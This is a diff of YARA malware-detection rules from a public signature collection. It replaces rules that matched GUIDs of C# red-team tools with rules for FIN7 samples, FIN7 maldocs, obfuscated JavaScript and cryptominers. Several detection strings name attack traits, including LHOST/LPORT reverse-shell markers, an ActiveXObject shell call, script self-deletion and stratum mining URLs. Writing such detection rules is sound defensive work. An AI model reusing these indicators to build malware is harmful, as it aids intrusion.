-		logic_hash = "633cfdc2f1950f36474e15cb186fc4673e7cbc9417fdbee61409b14be94bc6cb"
+		logic_hash = "8e62c9488f211635ae30633a0d894b00e0ba2a7e7d4cb628117a166d4f0f9697"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "60cd98fc4cb2ae474e9eab81cd34fd3c3f638ad77e4f5d5c82ca46f3471c3020"
 
 	strings:
-		$typelibguid0lo = "f7fc19da-67a3-437d-b3b0-2a257f77a00b" ascii wide
-		$typelibguid1lo = "47e85bb6-9138-4374-8092-0aeb301fe64b" ascii wide
-		$typelibguid2lo = "c7d854d8-4e3a-43a6-872f-e0710e5943f7" ascii wide
-		$typelibguid3lo = "d6685430-8d8d-4e2e-b202-de14efa25211" ascii wide
-		$typelibguid4lo = "1df925fc-9a89-4170-b763-1c735430b7d0" ascii wide
-		$typelibguid5lo = "817cc61b-8471-4c1e-b5d6-c754fc550a03" ascii wide
-		$typelibguid6lo = "60116613-c74e-41b9-b80e-35e02f25891e" ascii wide
+		$s1 = "constructor or from DllMain." fullword ascii
+		$s2 = "Network Software Ltd0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_0668 : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "54c87578-f0f1-5108-a736-b6acd9624d29"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/RedCursorSecurityConsulting/CVE-2020-0668"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2502-L2515"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0b0ce882-1c18-5741-bb71-0cef010dc778"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L126-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ac81e20fa9e5a4f701172d3e68c016b33e5cbda6053505d46f761337fb374161"
+		logic_hash = "3f757bc4a6d46be85732fe33dd0a323c5774cbc1f0da2b984c5db14c1362745a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "995b90281774798a376db67f906a126257d314efc21b03768941f2f819cf61a6"
 
 	strings:
-		$typelibguid0lo = "1b4c5ec1-2845-40fd-a173-62c450f12ea5" ascii wide
+		$s1 = "cvzdfhtjkdhbfszngjdng" fullword ascii
+		$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsrpcclients : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_4 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "70fd7431-8c32-52a4-be9f-2a19ef77f2cc"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/tyranid/WindowsRpcClients"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2517-L2536"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bead79bb-28c2-59ed-985b-e44b41e7f66a"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L142-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2e99c98514bde102450b119cda3cc3c20d7680de5ccbbf64124b719fb8333e8d"
+		logic_hash = "cd8a33c4e4f626d744e03f48e093f6a45223c74088b03185833ece8034614ca4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4b5405fc253ed3a89c770096a13d90648eac10a7fb12980e587f73483a07aa4c"
 
 	strings:
-		$typelibguid0lo = "843d8862-42eb-49ee-94e6-bca798dd33ea" ascii wide
-		$typelibguid1lo = "632e4c3b-3013-46fc-bc6e-22828bf629e3" ascii wide
-		$typelibguid2lo = "a2091d2f-6f7e-4118-a203-4cea4bea6bfa" ascii wide
-		$typelibguid3lo = "950ef8ce-ec92-4e02-b122-0d41d83065b8" ascii wide
-		$typelibguid4lo = "d51301bc-31aa-4475-8944-882ecf80e10d" ascii wide
-		$typelibguid5lo = "823ff111-4de2-4637-af01-4bdc3ca4cf15" ascii wide
-		$typelibguid6lo = "5d28f15e-3bb8-4088-abe0-b517b31d4595" ascii wide
+		$s1 = "c:\\file.dat" fullword wide
+		$s2 = "constructor or from DllMain." fullword ascii
+		$s3 = "lineGetCallIDs" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpfruit : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_5 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bf318530-b17d-5275-84b2-c284528bdae6"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rvrsh3ll/SharpFruit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2538-L2551"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6c810662-9ceb-5c3b-8f83-5a4aa2a5d461"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L159-L173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da59a7c8fb038171a560d337a49f33a28a2ea88e4c7b08df12eaeb85906c0753"
+		logic_hash = "893e144d86025db750b32ae69964578ec92862face706339a5bafb393e3c7091"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
 
 	strings:
-		$typelibguid0lo = "3da2f6de-75be-4c9d-8070-08da45e79761" ascii wide
+		$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
+		$s3 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwitness : FILE
+
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_6 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5e707da6-b2dd-511e-89ad-d19b93e8fca6"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rasta-mouse/SharpWitness"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2553-L2566"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2b2e6b74-5d71-5656-8faf-37c94607d93e"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L175-L198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a9bc18362347f55b77ec275ad377da9e72ac8a65cab06a867ae55b61b69e7cd"
+		logic_hash = "33db8e61b6220d9e16191228573d3d375cce9528241dcf1ad74d641f0959f03b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1439d301d931c8c4b00717b9057b23f0eb50049916a48773b17397135194424a"
 
 	strings:
-		$typelibguid0lo = "b9f6ec34-4ccc-4247-bcef-c1daab9b4469" ascii wide
+		$s1 = "coreServiceShell.exe" fullword ascii
+		$s2 = "PtSessionAgent.exe" fullword ascii
+		$s3 = "TiniMetI.exe" fullword ascii
+		$s4 = "PwmSvc.exe" fullword ascii
+		$s5 = "uiSeAgnt.exe" fullword ascii
+		$s7 = "LHOST:" fullword ascii
+		$s8 = "TRANSPORT:" fullword ascii
+		$s9 = "LPORT:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.exports ( "TiniStart" ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Rexcrypter : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_7 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5ebbeab3-3e93-5544-8f74-3d1b47335d8b"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/syrex1013/RexCrypter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2568-L2581"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "96943654-a6e8-59c0-ab6c-1ab3906a5d05"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L200-L214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fc8bd8eaa3561431bc8886de74b1d569d5fa1f2de7f866146669b4e918a3bf30"
+		logic_hash = "212bc13d22d7bc6b0ef10ae034ea09c7ea0d0e66afd212fb55c09cf43344c2ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ce8ce35f85406cd7241c6cc402431445fa1b5a55c548cca2ea30eeb4a423b6f0"
 
 	strings:
-		$typelibguid0lo = "10cd7c1c-e56d-4b1b-80dc-e4c496c5fec5" ascii wide
+		$s1 = "libpng version" fullword ascii
+		$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpersist : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_8 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0c181186-7bb4-502b-8937-60cfd88ce689"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/fireeye/SharPersist"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2583-L2596"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1eb9810e-2b50-5a93-925e-073bb17e1e6c"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L216-L229"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "265f42a83973cacb82d4ff12db210ad6cb10265acc38724ed895dc772cf7855e"
+		logic_hash = "f15a8dfd3efb094ab73caebe9bffb5735762960445ca421cd49eaa091ecea300"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d8bda53d7f2f1e4e442a0e1c30a20d6b0ac9c6880947f5dd36f78e4378b20c5c"
 
 	strings:
-		$typelibguid0lo = "9d1b853e-58f1-4ba5-aefc-5c221ca30e48" ascii wide
+		$s1 = "GetL3st3rr" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2019_1253 : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_10 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3e18b533-1b85-5eaf-bb3d-aa5b90fd2e28"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/padovah4ck/CVE-2019-1253"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2598-L2611"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2c6f557e-31d3-5377-a3fa-4f1507f28386"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L231-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f365dcec83696032370192d95312999d3baa950379472b99af17687a501dfa9c"
+		logic_hash = "1d6dba0c858eacea5bd67682a588105a2ff09d10bb60d9888ace07609c9b33de"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8cc02b721683f8b880c8d086ed055006dcf6155a6cd19435f74dd9296b74f5fc"
 
 	strings:
-		$typelibguid0lo = "584964c1-f983-498d-8370-23e27fdd0399" ascii wide
+		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+               00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43
+               00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74
+               00 20 00 31 00 20 00 2D 00 20 00 31 00 39 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Scout : FILE
+rule SIGNATURE_BASE_APT_FIN7_Sample_EXE_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cd24cca7-3bc0-5e7a-9817-dc3b26ec8358"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/jaredhaight/scout"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2613-L2626"
+		description = "Detects FIN7 Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7c66a234-9dee-5279-b855-892b12d036ff"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L250-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b677eb07dde231e1d6d542aaafcc0350ce51a66c5396949dd0f1d41311a822b5"
+		logic_hash = "780e2cb9a704e0df0383737928c2cfc8aa5de5a8f3c9dc67de866d5ac73b8402"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "608003c2165b0954f396d835882479f2504648892d0393f567e4a4aa90659bf9"
+		hash2 = "deb62514704852ccd9171d40877c59031f268db917c23d00a2f0113dab79aa3b"
+		hash3 = "16de81428a034c7b2636c4a875809ab62c9eefcd326b50c3e629df3b141cc32b"
+		hash4 = "3937abdd1fd63587022ed540a31c58c87c2080cdec51dd24af3201a6310059d4"
+		hash5 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
 
 	strings:
-		$typelibguid0lo = "d9c76e82-b848-47d4-8f22-99bf22a8ee11" ascii wide
+		$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
+		$s2 = "dx=%d, dy=%d" fullword ascii
+		$s3 = "Error with JP2H box size" fullword ascii
+		$co1 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+               00 00 00 00 00 00 00 00 00 00 00 2E 63 6F 64 65
+               00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $s* ) and $co1 at 0x015D
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Grouper2 : FILE
+rule SIGNATURE_BASE_APT_FIN7_Msdoc_Sep21_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a9cd9a16-b2a5-5d15-af89-7a8d0f1835bb"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/l0ss/Grouper2/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2628-L2641"
+		description = "Detects MalDocs used by FIN7 group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4fbde087-ec1e-5614-af1e-f342b1766fa2"
+		date = "2021-09-07"
+		modified = "2023-12-05"
+		reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L277-L301"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b89180f81c4231ea03bb49631b0931b2b7e4ff9e97f44798dd50f6fa4d12b75f"
-		score = 75
+		logic_hash = "ffc91cdad91b8ab24840c6ef1a6c39aad081d986c21a88b3f2ea3ec1bcd3b52b"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d60b6a8310373c9b84e6760c24185535"
 
 	strings:
-		$typelibguid0lo = "5decaea3-2610-4065-99dc-65b9b4ba6ccd" ascii wide
+		$xc1 = { 00 4A 00 6F 00 68 00 6E 00 0B 00 57 00 31 00 30
+               00 50 00 72 00 6F 00 4F 00 66 00 66 00 31 00 36 }
+		$s1 = "word_data.bin" ascii fullword
+		$s2 = "V:\\DOC\\For_JS" ascii
+		$s3 = "HomeCompany" ascii
+		$s4 = "W10ProOff16" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0xcfd0 and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Casperstager : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_JS_Sept21_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0ad18d2b-b7cc-5316-a8e8-b05d4439b8e1"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/ustayready/CasperStager"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2643-L2657"
+		description = "Detects JavaScript obfuscation as used in MalDocs by FIN7 group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5ab9cd60-077c-5066-bd2f-8da261aae1e0"
+		date = "2021-09-07"
+		modified = "2023-12-05"
+		reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L303-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "556dd774b6ba38371951ca416133573b0539d699671200e3accfe5bc6fbc979d"
-		score = 75
+		logic_hash = "235ff8fe5c033fd90d77ecf9ce80b59be7bf6ae5a2863a1c9365d8b125a7ff3f"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c653a9f2-0939-43c8-9b93-fed5e2e4c7e6" ascii wide
-		$typelibguid1lo = "48dfc55e-6ae5-4a36-abef-14bc09d7510b" ascii wide
+		$s1 = "=new RegExp(String.fromCharCode(" ascii
+		$s2 = ".charCodeAt(" ascii
+		$s3 = ".substr(0, " ascii
+		$s4 = "var shell = new ActiveXObject(" ascii
+		$s5 = "= new Date().getUTCMilliseconds();" ascii
+		$s6 = ".deleteFile(WScript.ScriptFullName);" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 6000KB and ( 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Tellmeyoursecrets : FILE
+rule SIGNATURE_BASE_Coinminer_Strings : SCRIPT HIGHVOL FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b00c353b-0446-5faa-87e5-0a7ba6ec2286"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xbadjuju/TellMeYourSecrets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2659-L2672"
+		description = "Detects mining pool protocol string in Executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ac045f83-5f32-57a9-8011-99a2658a0e05"
+		date = "2018-01-04"
+		modified = "2021-10-26"
+		reference = "https://minergate.com/faq/what-pool-address"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_cryptocoin_miner.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b606c11986ff26d279db58c088633f39eddb41c96c2510f7738cfcef5ff4941f"
-		score = 75
+		logic_hash = "2d63bf90560c83ab6c09e0c82b6a6449bca6e7e7d0945d3782c2fa9a726b2ca1"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, HIGHVOL, FILE"
+		nodeepdive = 1
 
 	strings:
-		$typelibguid0lo = "9b448062-7219-4d82-9a0a-e784c4b3aa27" ascii wide
+		$sa1 = "stratum+tcp://" ascii
+		$sa2 = "stratum+udp://" ascii
+		$sb1 = "\"normalHashing\": true,"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpexcel4_DCOM : FILE
+rule SIGNATURE_BASE_Coinhive_Javascript_Monerominer : HIGHVOL FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "12d3f26b-40ca-5034-a7c2-9be9c8a7599b"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rvrsh3ll/SharpExcel4-DCOM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2674-L2687"
+		description = "Detects CoinHive - JavaScript Crypto Miner"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4f40c342-fcdc-5c73-a3cf-7b2ed438eaaf"
+		date = "2018-01-04"
+		modified = "2023-12-05"
+		reference = "https://coinhive.com/documentation/miner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_cryptocoin_miner.yar#L20-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "278eeabdfa26eec5f9e6d2fba093b4698a9813813f644b65e4e28791b600a5dc"
-		score = 75
+		logic_hash = "4146b034a9785f1bb7c60db62db0e478d960f2ac9adb7c5b74b365186578ca47"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "68b83ce5-bbd9-4ee3-b1cc-5e9223fab52b" ascii wide
+		$s2 = "CoinHive.CONFIG.REQUIRES_AUTH" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 65KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshooter : FILE
+rule SIGNATURE_BASE_PUA_Cryptominer_Jan19_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a59e6fe9-dbaf-5830-8cf1-485ff4dd939a"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/mdsecactivebreach/SharpShooter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2689-L2702"
+		description = "Detects Crypto Miner strings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "aebfdce9-c2dd-5f24-aa25-071e1a961239"
+		date = "2019-01-31"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_cryptocoin_miner.yar#L35-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79a63f9a24b94327b5b720c415143977c7fba088930dd94f6f2f2784770d182d"
-		score = 75
